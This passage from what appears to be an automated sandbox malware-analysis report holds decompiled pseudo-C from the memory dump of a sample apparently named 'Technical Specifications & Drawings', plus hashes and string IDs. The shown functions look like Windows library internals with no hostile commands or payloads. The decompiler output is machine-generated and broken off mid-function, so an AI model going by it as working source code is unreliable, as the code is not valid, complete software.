                                                  							if(_t30 != 0xc0000023) {
                                                  								L9:
                                                  								_push(_t26);
                                                  								_push( *_t26);
                                                  								_push(_t31);
                                                  								_push(_v8);
                                                  								_push( &_v16);
                                                  								_t30 = E017EA9B0();
                                                  								if(_t30 < 0) {
                                                  									L12:
                                                  									if(_t31 != 0) {
                                                  										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                  									}
                                                  								} else {
                                                  									 *_a8 = _t31;
                                                  								}
                                                  							} else {
                                                  								_t19 =  *_t26;
                                                  								if( *_t26 == 0) {
                                                  									_t31 = 0;
                                                  								} else {
                                                  									L7:
                                                  									_t31 = L017C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                  								}
                                                  								if(_t31 == 0) {
                                                  									_t30 = 0xc0000017;
                                                  								} else {
                                                  									goto L9;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t30;
                                                  			}










                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: WindowsExcludedProcs
                                                  • API String ID: 0-3583428290
                                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                  • Instruction ID: e6540ec97a217056d716bfd7644759fd354f0b692b6a0e81a69c006a977b184f
                                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                  • Instruction Fuzzy Hash: 2A21F53A501229EBDB22DA59A894F9BFBADAF44B50F064465FA04DB204D730DD0097E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                  				intOrPtr _t13;
                                                  				intOrPtr _t14;
                                                  				signed int _t16;
                                                  				signed char _t17;
                                                  				intOrPtr _t19;
                                                  				intOrPtr _t21;
                                                  				intOrPtr _t23;
                                                  				intOrPtr* _t25;
                                                  
                                                  				_t25 = _a8;
                                                  				_t17 = __ecx;
                                                  				if(_t25 == 0) {
                                                  					_t19 = 0xc00000f2;
                                                  					L8:
                                                  					return _t19;
                                                  				}
                                                  				if((__ecx & 0xfffffffe) != 0) {
                                                  					_t19 = 0xc00000ef;
                                                  					goto L8;
                                                  				}
                                                  				_t19 = 0;
                                                  				 *_t25 = 0;
                                                  				_t21 = 0;
                                                  				_t23 = "Actx ";
                                                  				if(__edx != 0) {
                                                  					if(__edx == 0xfffffffc) {
                                                  						L21:
                                                  						_t21 = 0x200;
                                                  						L5:
                                                  						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                  						 *_t25 = _t13;
                                                  						L6:
                                                  						if(_t13 == 0) {
                                                  							if((_t17 & 0x00000001) != 0) {
                                                  								 *_t25 = _t23;
                                                  							}
                                                  						}
                                                  						L7:
                                                  						goto L8;
                                                  					}
                                                  					if(__edx == 0xfffffffd) {
                                                  						 *_t25 = _t23;
                                                  						_t13 = _t23;
                                                  						goto L6;
                                                  					}
                                                  					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                  					 *_t25 = _t13;
                                                  					L14:
                                                  					if(_t21 == 0) {
                                                  						goto L6;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  				_t14 = _a4;
                                                  				if(_t14 != 0) {
                                                  					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                  					if(_t16 <= 1) {
                                                  						_t21 = 0x1f8;
                                                  						_t13 = 0;
                                                  						goto L14;
                                                  					}
                                                  					if(_t16 == 2) {
                                                  						goto L21;
                                                  					}
                                                  					if(_t16 != 4) {
                                                  						_t19 = 0xc00000f0;
                                                  						goto L7;
                                                  					}
                                                  					_t13 = 0;
                                                  					goto L6;
                                                  				} else {
                                                  					_t21 = 0x1f8;
                                                  					goto L5;
                                                  				}
                                                  			}












                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx
                                                  • API String ID: 0-89312691
                                                  • Opcode ID: 4d737f819d85ed918fa636847063e6560b0e8a056d2b3ca4160f6307a6dbb73f
                                                  • Instruction ID: a10cd916f357f2f37276aca4c6398d5ab7d055f9061b7a2f99cb0181727621ee
                                                  • Opcode Fuzzy Hash: 4d737f819d85ed918fa636847063e6560b0e8a056d2b3ca4160f6307a6dbb73f
                                                  • Instruction Fuzzy Hash: D211B2353057028BEB254F1D8490736F69BEB95F24FB4457EE961CB791DB70C8418341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 71%
                                                  			E01858DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr _t35;
                                                  				void* _t41;
                                                  
                                                  				_t40 = __esi;
                                                  				_t39 = __edi;
                                                  				_t38 = __edx;
                                                  				_t35 = __ecx;
                                                  				_t34 = __ebx;
                                                  				_push(0x74);
                                                  				_push(0x1880d50);
                                                  				E017FD0E8(__ebx, __edi, __esi);
                                                  				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                  				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                  				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                  					E01835720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                  					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                  						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                  						asm("int3");
                                                  						 *(_t41 - 4) = 0xfffffffe;
                                                  					}
                                                  				}
                                                  				 *(_t41 - 4) = 1;
                                                  				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                  				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                  				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                  				 *((intOrPtr*)(_t41 - 0x64)) = E017FDEF0;
                                                  				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                  				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                  				_push(_t41 - 0x70);
                                                  				E017FDEF0(1, _t38);
                                                  				 *(_t41 - 4) = 0xfffffffe;
                                                  				return E017FD130(_t34, _t39, _t40);
                                                  			}






                                                  Strings
                                                  • Critical error detected %lx, xrefs: 01858E21
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Critical error detected %lx
                                                  • API String ID: 0-802127002
                                                  • Opcode ID: 5b0da801c428f974a7de65e1a4726a93a3ddfe196c843f10c0e3232e6c50509f
                                                  • Instruction ID: 7817ce54be792944f44e9d106fc13819fc474aa749d1465b12a9e690f57d83f4
                                                  • Opcode Fuzzy Hash: 5b0da801c428f974a7de65e1a4726a93a3ddfe196c843f10c0e3232e6c50509f
                                                  • Instruction Fuzzy Hash: 5F117975D04348DADF25DFA9C5057DDBBB0EB05314F20421ED529AB392C3340601DF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E01875BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				signed int _t296;
                                                  				signed char _t298;
                                                  				signed int _t301;
                                                  				signed int _t306;
                                                  				signed int _t310;
                                                  				signed char _t311;
                                                  				intOrPtr _t312;
                                                  				signed int _t313;
                                                  				void* _t327;
                                                  				signed int _t328;
                                                  				intOrPtr _t329;
                                                  				intOrPtr _t333;
                                                  				signed char _t334;
                                                  				signed int _t336;
                                                  				void* _t339;
                                                  				signed int _t340;
                                                  				signed int _t356;
                                                  				signed int _t362;
                                                  				short _t367;
                                                  				short _t368;
                                                  				short _t373;
                                                  				signed int _t380;
                                                  				void* _t382;
                                                  				short _t385;
                                                  				signed short _t392;
                                                  				signed char _t393;
                                                  				signed int _t395;
                                                  				signed char _t397;
                                                  				signed int _t398;
                                                  				signed short _t402;
                                                  				void* _t406;
                                                  				signed int _t412;
                                                  				signed char _t414;
                                                  				signed short _t416;
                                                  				signed int _t421;
                                                  				signed char _t427;
                                                  				intOrPtr _t434;
                                                  				signed char _t435;
                                                  				signed int _t436;
                                                  				signed int _t442;
                                                  				signed int _t446;
                                                  				signed int _t447;
                                                  				signed int _t451;
                                                  				signed int _t453;
                                                  				signed int _t454;
                                                  				signed int _t455;
                                                  				intOrPtr _t456;
                                                  				intOrPtr* _t457;
                                                  				short _t458;
                                                  				signed short _t462;
                                                  				signed int _t469;
                                                  				intOrPtr* _t474;
                                                  				signed int _t475;
                                                  				signed int _t479;
                                                  				signed int _t480;
                                                  				signed int _t481;
                                                  				short _t485;
                                                  				signed int _t491;
                                                  				signed int* _t494;
                                                  				signed int _t498;
                                                  				signed int _t505;
                                                  				intOrPtr _t506;
                                                  				signed short _t508;
                                                  				signed int _t511;
                                                  				void* _t517;
                                                  				signed int _t519;
                                                  				signed int _t522;
                                                  				void* _t523;
                                                  				signed int _t524;
                                                  				void* _t528;
                                                  				signed int _t529;
                                                  
                                                  				_push(0xd4);
                                                  				_push(0x1881178);
                                                  				E017FD0E8(__ebx, __edi, __esi);
                                                  				_t494 = __edx;
                                                  				 *(_t528 - 0xcc) = __edx;
                                                  				_t511 = __ecx;
                                                  				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                  				 *(_t528 - 0xbc) = __ecx;
                                                  				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                  				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                  				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                  				_t427 = 0;
                                                  				 *(_t528 - 0x74) = 0;
                                                  				 *(_t528 - 0x9c) = 0;
                                                  				 *(_t528 - 0x84) = 0;
                                                  				 *(_t528 - 0xac) = 0;
                                                  				 *(_t528 - 0x88) = 0;
                                                  				 *(_t528 - 0xa8) = 0;
                                                  				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                  				if( *(_t528 + 0x1c) <= 0x80) {
                                                  					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                  					if(__eflags != 0) {
                                                  						_t421 = E01874C56(0, __edx, __ecx, __eflags);
                                                  						__eflags = _t421;
                                                  						if(_t421 != 0) {
                                                  							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                  							E017ED000(0x410);
                                                  							 *(_t528 - 0x18) = _t529;
                                                  							 *(_t528 - 0x9c) = _t529;
                                                  							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                  							E01875542(_t528 - 0x9c, _t528 - 0x84);
                                                  						}
                                                  					}
                                                  					_t435 = _t427;
                                                  					 *(_t528 - 0xd0) = _t435;
                                                  					_t474 = _t511 + 0x65;
                                                  					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                  					_t511 = 0x18;
                                                  					while(1) {
                                                  						 *(_t528 - 0xa0) = _t427;
                                                  						 *(_t528 - 0xbc) = _t427;
                                                  						 *(_t528 - 0x80) = _t427;
                                                  						 *(_t528 - 0x78) = 0x50;
                                                  						 *(_t528 - 0x79) = _t427;
                                                  						 *(_t528 - 0x7a) = _t427;
                                                  						 *(_t528 - 0x8c) = _t427;
                                                  						 *(_t528 - 0x98) = _t427;
                                                  						 *(_t528 - 0x90) = _t427;
                                                  						 *(_t528 - 0xb0) = _t427;
                                                  						 *(_t528 - 0xb8) = _t427;
                                                  						_t296 = 1 << _t435;
                                                  						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                  						__eflags = _t436 & _t296;
                                                  						if((_t436 & _t296) != 0) {
                                                  							goto L92;
                                                  						}
                                                  						__eflags =  *((char*)(_t474 - 1));
                                                  						if( *((char*)(_t474 - 1)) == 0) {
                                                  							goto L92;
                                                  						}
                                                  						_t301 =  *_t474;
                                                  						__eflags = _t494[1] - _t301;
                                                  						if(_t494[1] <= _t301) {
                                                  							L10:
                                                  							__eflags =  *(_t474 - 5) & 0x00000040;
                                                  							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                  								L12:
                                                  								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                  								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                  									goto L92;
                                                  								}
                                                  								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                  								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                  								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                  									goto L92;
                                                  								}
                                                  								__eflags = _t442 -  *(_t474 - 0x11);
                                                  								if(_t442 !=  *(_t474 - 0x11)) {
                                                  									goto L92;
                                                  								}
                                                  								L15:
                                                  								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                  								 *(_t528 - 0xc0) = _t306;
                                                  								 *(_t528 - 0xa4) = _t306;
                                                  								__eflags =  *0x18960e8;
                                                  								if( *0x18960e8 != 0) {
                                                  									__eflags = _t306 - 0x40;
                                                  									if(_t306 < 0x40) {
                                                  										L20:
                                                  										asm("lock inc dword [eax]");
                                                  										_t310 =  *0x18960e8; // 0x0
                                                  										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                  										__eflags = _t311 & 0x00000001;
                                                  										if((_t311 & 0x00000001) == 0) {
                                                  											 *(_t528 - 0xa0) = _t311;
                                                  											_t475 = _t427;
                                                  											 *(_t528 - 0x74) = _t427;
                                                  											__eflags = _t475;
                                                  											if(_t475 != 0) {
                                                  												L91:
                                                  												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                  												goto L92;
                                                  											}
                                                  											asm("sbb edi, edi");
                                                  											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                  											_t511 = _t498;
                                                  											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                  											__eflags =  *(_t312 - 5) & 1;
                                                  											if(( *(_t312 - 5) & 1) != 0) {
                                                  												_push(_t528 - 0x98);
                                                  												_push(0x4c);
                                                  												_push(_t528 - 0x70);
                                                  												_push(1);
                                                  												_push(0xfffffffa);
                                                  												_t412 = E017E9710();
                                                  												_t475 = _t427;
                                                  												__eflags = _t412;
                                                  												if(_t412 >= 0) {
                                                  													_t414 =  *(_t528 - 0x98) - 8;
                                                  													 *(_t528 - 0x98) = _t414;
                                                  													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                  													 *(_t528 - 0x8c) = _t416;
                                                  													 *(_t528 - 0x79) = 1;
                                                  													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                  													__eflags = _t511;
                                                  												}
                                                  											}
                                                  											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                  											__eflags = _t446 & 0x00000004;
                                                  											if((_t446 & 0x00000004) != 0) {
                                                  												__eflags =  *(_t528 - 0x9c);
                                                  												if( *(_t528 - 0x9c) != 0) {
                                                  													 *(_t528 - 0x7a) = 1;
                                                  													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                  													__eflags = _t511;
                                                  												}
                                                  											}
                                                  											_t313 = 2;
                                                  											_t447 = _t446 & _t313;
                                                  											__eflags = _t447;
                                                  											 *(_t528 - 0xd4) = _t447;
                                                  											if(_t447 != 0) {
                                                  												_t406 = 0x10;
                                                  												_t511 = _t511 + _t406;
                                                  												__eflags = _t511;
                                                  											}
                                                  											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                  											 *(_t528 - 0x88) = _t427;
                                                  											__eflags =  *(_t528 + 0x1c);
                                                  											if( *(_t528 + 0x1c) <= 0) {
                                                  												L45:
                                                  												__eflags =  *(_t528 - 0xb0);
                                                  												if( *(_t528 - 0xb0) != 0) {
                                                  													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                  													__eflags = _t511;
                                                  												}
                                                  												__eflags = _t475;
                                                  												if(_t475 != 0) {
                                                  													asm("lock dec dword [ecx+edx*8+0x4]");
                                                  													goto L100;
                                                  												} else {
                                                  													_t494[3] = _t511;
                                                  													_t451 =  *(_t528 - 0xa0);
                                                  													_t427 = E017E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                  													 *(_t528 - 0x88) = _t427;
                                                  													__eflags = _t427;
                                                  													if(_t427 == 0) {
                                                  														__eflags = _t511 - 0xfff8;
                                                  														if(_t511 <= 0xfff8) {
                                                  															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                  															asm("sbb ecx, ecx");
                                                  															__eflags = (_t451 & 0x000000e2) + 8;
                                                  														}
                                                  														asm("lock dec dword [eax+edx*8+0x4]");
                                                  														L100:
                                                  														goto L101;
                                                  													}
                                                  													_t453 =  *(_t528 - 0xa0);
                                                  													 *_t494 = _t453;
                                                  													_t494[1] = _t427;
                                                  													_t494[2] =  *(_t528 - 0xbc);
                                                  													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                  													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                  													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                  													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													__eflags =  *(_t528 + 0x14);
                                                  													if( *(_t528 + 0x14) == 0) {
                                                  														__eflags =  *[fs:0x18] + 0xf50;
                                                  													}
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													asm("movsd");
                                                  													__eflags =  *(_t528 + 0x18);
                                                  													if( *(_t528 + 0x18) == 0) {
                                                  														_t454 =  *(_t528 - 0x80);
                                                  														_t479 =  *(_t528 - 0x78);
                                                  														_t327 = 1;
                                                  														__eflags = 1;
                                                  													} else {
                                                  														_t146 = _t427 + 0x50; // 0x50
                                                  														_t454 = _t146;
                                                  														 *(_t528 - 0x80) = _t454;
                                                  														_t382 = 0x18;
                                                  														 *_t454 = _t382;
                                                  														 *((short*)(_t454 + 2)) = 1;
                                                  														_t385 = 0x10;
                                                  														 *((short*)(_t454 + 6)) = _t385;
                                                  														 *(_t454 + 4) = 0;
                                                  														asm("movsd");
                                                  														asm("movsd");
                                                  														asm("movsd");
                                                  														asm("movsd");
                                                  														_t327 = 1;
                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                  														_t479 = 0x68;
                                                  														 *(_t528 - 0x78) = _t479;
                                                  													}
                                                  													__eflags =  *(_t528 - 0x79) - _t327;
                                                  													if( *(_t528 - 0x79) == _t327) {
                                                  														_t524 = _t479 + _t427;
                                                  														_t508 =  *(_t528 - 0x8c);
                                                  														 *_t524 = _t508;
                                                  														_t373 = 2;
                                                  														 *((short*)(_t524 + 2)) = _t373;
                                                  														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                  														 *((short*)(_t524 + 4)) = 0;
                                                  														_t167 = _t524 + 8; // 0x8
                                                  														E017EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                  														_t529 = _t529 + 0xc;
                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                  														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                  														 *(_t528 - 0x78) = _t479;
                                                  														_t380 =  *(_t528 - 0x80);
                                                  														__eflags = _t380;
                                                  														if(_t380 != 0) {
                                                  															_t173 = _t380 + 4;
                                                  															 *_t173 =  *(_t380 + 4) | 1;
                                                  															__eflags =  *_t173;
                                                  														}
                                                  														_t454 = _t524;
                                                  														 *(_t528 - 0x80) = _t454;
                                                  														_t327 = 1;
                                                  														__eflags = 1;
                                                  													}
                                                  													__eflags =  *(_t528 - 0xd4);
                                                  													if( *(_t528 - 0xd4) == 0) {
                                                  														_t505 =  *(_t528 - 0x80);
                                                  													} else {
                                                  														_t505 = _t479 + _t427;
                                                  														_t523 = 0x10;
                                                  														 *_t505 = _t523;
                                                  														_t367 = 3;
                                                  														 *((short*)(_t505 + 2)) = _t367;
                                                  														_t368 = 4;
                                                  														 *((short*)(_t505 + 6)) = _t368;
                                                  														 *(_t505 + 4) = 0;
                                                  														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                  														_t327 = 1;
                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                  														_t479 = _t479 + _t523;
                                                  														 *(_t528 - 0x78) = _t479;
                                                  														__eflags = _t454;
                                                  														if(_t454 != 0) {
                                                  															_t186 = _t454 + 4;
                                                  															 *_t186 =  *(_t454 + 4) | 1;
                                                  															__eflags =  *_t186;
                                                  														}
                                                  														 *(_t528 - 0x80) = _t505;
                                                  													}
                                                  													__eflags =  *(_t528 - 0x7a) - _t327;
                                                  													if( *(_t528 - 0x7a) == _t327) {
                                                  														 *(_t528 - 0xd4) = _t479 + _t427;
                                                  														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                  														E017EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                  														_t529 = _t529 + 0xc;
                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                  														_t479 =  *(_t528 - 0x78) + _t522;
                                                  														 *(_t528 - 0x78) = _t479;
                                                  														__eflags = _t505;
                                                  														if(_t505 != 0) {
                                                  															_t199 = _t505 + 4;
                                                  															 *_t199 =  *(_t505 + 4) | 1;
                                                  															__eflags =  *_t199;
                                                  														}
                                                  														_t505 =  *(_t528 - 0xd4);
                                                  														 *(_t528 - 0x80) = _t505;
                                                  													}
                                                  													__eflags =  *(_t528 - 0xa8);
                                                  													if( *(_t528 - 0xa8) != 0) {
                                                  														_t356 = _t479 + _t427;
                                                  														 *(_t528 - 0xd4) = _t356;
                                                  														_t462 =  *(_t528 - 0xac);
                                                  														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                  														_t485 = 0xc;
                                                  														 *((short*)(_t356 + 2)) = _t485;
                                                  														 *(_t356 + 6) = _t462;
                                                  														 *((short*)(_t356 + 4)) = 0;
                                                  														_t211 = _t356 + 8; // 0x9
                                                  														E017EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                  														E017EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                  														_t529 = _t529 + 0x18;
                                                  														_t427 =  *(_t528 - 0x88);
                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                  														_t505 =  *(_t528 - 0xd4);
                                                  														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                  														 *(_t528 - 0x78) = _t479;
                                                  														_t362 =  *(_t528 - 0x80);
                                                  														__eflags = _t362;
                                                  														if(_t362 != 0) {
                                                  															_t222 = _t362 + 4;
                                                  															 *_t222 =  *(_t362 + 4) | 1;
                                                  															__eflags =  *_t222;
                                                  														}
                                                  													}
                                                  													__eflags =  *(_t528 - 0xb0);
                                                  													if( *(_t528 - 0xb0) != 0) {
                                                  														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                  														_t458 = 0xb;
                                                  														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                  														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                  														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                  														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                  														E017EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                  														_t529 = _t529 + 0xc;
                                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                  														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                  														 *(_t528 - 0x78) = _t479;
                                                  														__eflags = _t505;
                                                  														if(_t505 != 0) {
                                                  															_t241 = _t505 + 4;
                                                  															 *_t241 =  *(_t505 + 4) | 1;
                                                  															__eflags =  *_t241;
                                                  														}
                                                  													}
                                                  													_t328 =  *(_t528 + 0x1c);
                                                  													__eflags = _t328;
                                                  													if(_t328 == 0) {
                                                  														L87:
                                                  														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                  														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                  														_t455 =  *(_t528 - 0xdc);
                                                  														 *(_t427 + 0x14) = _t455;
                                                  														_t480 =  *(_t528 - 0xa0);
                                                  														_t517 = 3;
                                                  														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                  														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                  															asm("rdtsc");
                                                  															 *(_t427 + 0x3c) = _t480;
                                                  														} else {
                                                  															 *(_t427 + 0x3c) = _t455;
                                                  														}
                                                  														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                  														_t456 =  *[fs:0x18];
                                                  														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                  														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                  														_t427 = 0;
                                                  														__eflags = 0;
                                                  														_t511 = 0x18;
                                                  														goto L91;
                                                  													} else {
                                                  														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                  														__eflags = _t519;
                                                  														 *(_t528 - 0x8c) = _t328;
                                                  														do {
                                                  															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                  															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                  															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                  															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                  															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                  															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                  																_t334 =  *_t519;
                                                  															} else {
                                                  																_t334 = 0;
                                                  															}
                                                  															_t336 = _t334 & 0x000000ff;
                                                  															__eflags = _t336;
                                                  															_t427 =  *(_t528 - 0x88);
                                                  															if(_t336 == 0) {
                                                  																_t481 = _t479 + _t506;
                                                  																__eflags = _t481;
                                                  																 *(_t528 - 0x78) = _t481;
                                                  																E017EF3E0(_t479 + _t427, _t457, _t506);
                                                  																_t529 = _t529 + 0xc;
                                                  															} else {
                                                  																_t340 = _t336 - 1;
                                                  																__eflags = _t340;
                                                  																if(_t340 == 0) {
                                                  																	E017EF3E0( *(_t528 - 0xb8), _t457, _t506);
                                                  																	_t529 = _t529 + 0xc;
                                                  																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                  																} else {
                                                  																	__eflags = _t340 == 0;
                                                  																	if(_t340 == 0) {
                                                  																		__eflags = _t506 - 8;
                                                  																		if(_t506 == 8) {
                                                  																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                  																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                  																		}
                                                  																	}
                                                  																}
                                                  															}
                                                  															_t339 = 0x10;
                                                  															_t519 = _t519 + _t339;
                                                  															_t263 = _t528 - 0x8c;
                                                  															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                  															__eflags =  *_t263;
                                                  															_t479 =  *(_t528 - 0x78);
                                                  														} while ( *_t263 != 0);
                                                  														goto L87;
                                                  													}
                                                  												}
                                                  											} else {
                                                  												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                  												 *(_t528 - 0xa2) = _t392;
                                                  												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                  												__eflags = _t469;
                                                  												while(1) {
                                                  													 *(_t528 - 0xe4) = _t511;
                                                  													__eflags = _t392;
                                                  													_t393 = _t427;
                                                  													if(_t392 != 0) {
